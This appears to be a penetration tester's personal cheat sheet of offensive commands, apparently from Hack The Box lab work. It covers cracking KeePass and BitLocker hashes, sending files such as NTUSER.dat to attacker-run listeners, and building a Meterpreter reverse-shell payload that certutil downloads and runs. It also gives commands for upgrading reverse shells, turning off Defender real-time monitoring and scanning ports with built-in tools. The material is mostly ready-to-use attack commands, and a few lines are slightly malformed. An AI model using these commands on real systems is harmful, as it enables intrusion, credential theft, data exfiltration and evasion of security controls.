Juicy Snippets
This is a collection of Juicy Snippets that I’ve used. Most of these scenarios are rare use cases but that’s why THEY”RE JUICY!
Cracking the KeePass database with John the Ripper
keepass2john Database.kdbx > Keepasshash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt
File Transfer from Windows
Upload Server (Python)
# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world
# Send a file
curl -X POST http://192.168.122.182:800/upload -H -F 'files=@NTUSER.dat'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
Certutil
certutil -encode data.txt tmp.b64 && findstr /v /c:- tmp.b64 > data.b64
certutil -encode playercounter-1.0-SNAPSHOT.jar tmp.b64 && findstr /v /c:- tmp.b64 > data.b64
Openssl
openssl base64 -d < loki-config-s3-base64encoded.txt
certutil -urlcache -f http://10.10.14.2:4245/expl.exe %temp%/expl.exe
PowerShell Base64 Web Upload
Another way to use PowerShell and base64 encoded files for upload operations is by using Invoke-WebRequest or Invoke-RestMethod together with Netcat. We use Netcat to listen in on a port we specify and send the file as a POST request. Finally, we copy the output and use the base64 decode function to convert the base64 string into a file.
PowerShell Script to Upload a File to Python Upload Server
PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
We catch the base64 data with Netcat and use the base64 application with the decode option to convert the string to the file.
PowerShell Script to Upload a File to Python Upload Server
vxdf@htb[/htb]$ nc -lvnp 8000
listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.129] 50923
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/x-www-form-urlencoded
Host: 192.168.49.128:8000
Content-Length: 1820
Connection: Keep-Alive
IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQo
...SNIP...
PowerShell Script to Upload a File to Python Upload Server
vxdf@htb[/htb]$ echo <base64> | base64 -d -w 0 > hosts
Mount Windows VHD on attack linux machine
If you’ve acquired a VHD file try this
Unzip VHD
7z x Backup.vhd
...SNIP...
'1.Basic data partition.img'
Extract Hashes
bitlocker2john -i '1.Basic data partition.img'
Create Hash File
echo '$bitlocker$0$16$60d83def3e335699830cc42793dae6e5$1048576$12$80b20a04341fd80103000000$60$ae149c9c17975483390d2afb7ff75c3e3380733976fa7d02bb29caebece6076c3c29096fc341a916c79b0db656a1f28e9f186e8b201c38653f64443a' > bitlock
Crack with JTR
john --wordlist=../mut_pass.list bitlock
Mount VHD and use cracked Pass
sudo modprobe nbd
sudo qemu-nbd -c /dev/nbd0 Backup.vhd
Iterator
Bash Iterator
#!/bin/bash
for i in {1..10}; do
echo "Iteration $i"
done
curl urls?
#!/bin/bash
for i in {1..10}; do
curl -s "http://blog.inlanefreight.local/?author=i"
done
Add vhost to /etc/hosts
vxdf@htb[/htb]$ IP=10.129.42.195
vxdf@htb[/htb]$ printf "%s\t%s\n\n" "$IP" "app.inlanefreight.local dev.inlanefreight.local
Shells
Upgrade Shell No TTY? No Problem
With python installed
python3 -c 'import pty; pty.spawn("/bin/bash")'
No python? No problem
Victim (Established RevShell)
Ctrl-Z
Attacker Host
stty raw -echo
fg
reset
Back on the reverse shell
export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 116
Now you can use Vim,Tmux,sqlclient,ftp, mysql in your reverse shell.
Windows MSFVenom
Meterpretor Shell with CertUtil (Windows)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4244 -f exe -o expl.exe
Start Http server
python3 -m http.server 4245
On Remote Machine
certutil -urlcache -f http://<tun0 IP>:4245/expl.exe %temp%/expl.exe
Start exe
start %temp%/expl.exe
Enable RDP on windows
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Disable Realtime Monitoring Powershell (Needs Perms)
Set-MpPreference -DisableRealtimeMonitoring $true
Check For RTM
Get-MpPreference | Select-Object -ExpandProperty "EnableRealtimeProtection"
LOTL Port Scanning
Living Off The Land port scanning
Python
Python is ubiquitous and often installed on Linux and sometimes even on Windows servers. Here’s a basic port scanner using Python’s socket library:
import socket
target = "example.com"
ports = range(1, 1025)
for port in ports:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
result = s.connect_ex((target, port))
if result == 0:
print(f"Port {port} is open.")
s.close()
To run this code, you’d typically save it to a .py file and execute it with Python. However, for a LOTL scenario, you’d probably want to run this directly from the command line. You can use Python’s one-liner execution:
python -c 'import socket; target="example.com"; ports=range(1,1025); [print(f"Port {port} is open.") for port in ports if not socket.create_connection((target, port), timeout=1).close()]'
Inline:
python -c 'import socket; target="example.com"; [print(f"Port {port} is open.") for port in range(1,1025) if not socket.create_connection((target, port), timeout=1).close()]'
Bash
On Linux, the bash shell provides a way to interface with the system. One common tool we can leverage for port scanning in bash is /dev/tcp. Here’s how we can use it:
#!/bin/bash
target="example.com"
for port in {1..1024}; do
(echo >/dev/tcp/$target/$port) > /dev/null 2>&1 && echo "Port $port is open."
done
Inline:
target="example.com"; for port in {1..1024}; do (echo >/dev/tcp/$target/$port) > /dev/null 2>&1 && echo "Port $port is open."; done
PowerShell
PowerShell is incredibly powerful and offers a breadth of functionality on Windows machines. Here’s a simple port scanner in PowerShell:
$target = "example.com"
1..1024 | ForEach-Object {
$port = $_
$TCPClient = New-Object System.Net.Sockets.TcpClient
Try {
$TCPClient.Connect($target, $port)
$TCPClient.Close()
Write-Host "Port $port is open."
} Catch {}
}
Single port
Test-NetConnection -Port 80 $IP
This script uses the .NET TcpClient class to attempt to connect to each port on the target. If it connects successfully, the port is open.
Inline:
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("$IP", $_)) "TCP port $_ is open"} 2>$null$
Alternative:
$target="example.com"; 1..1024 | % { $port=$_; $TCPClient=New-Object System.Net.Sockets.TcpClient; Try{$TCPClient.Connect($target, $port); $TCPClient.Close(); Write-Host "Port $port is open."}Catch{}}
Netcat
Netcat is a powerful tool for reading and writing to network connections. It’s available on many systems and offers a quick way to check for open ports.
#!/bin/bash
target="example.com"
for port in {1..1024}; do
nc -zv -w1 $target $port 2>&1 | grep succeeded && echo "Port $port is open."
done
Inline:
target="example.com"; for port in {1..1024}; do nc -zv -w1 $target $port 2>&1 | grep succeeded && echo "Port $port is open."; done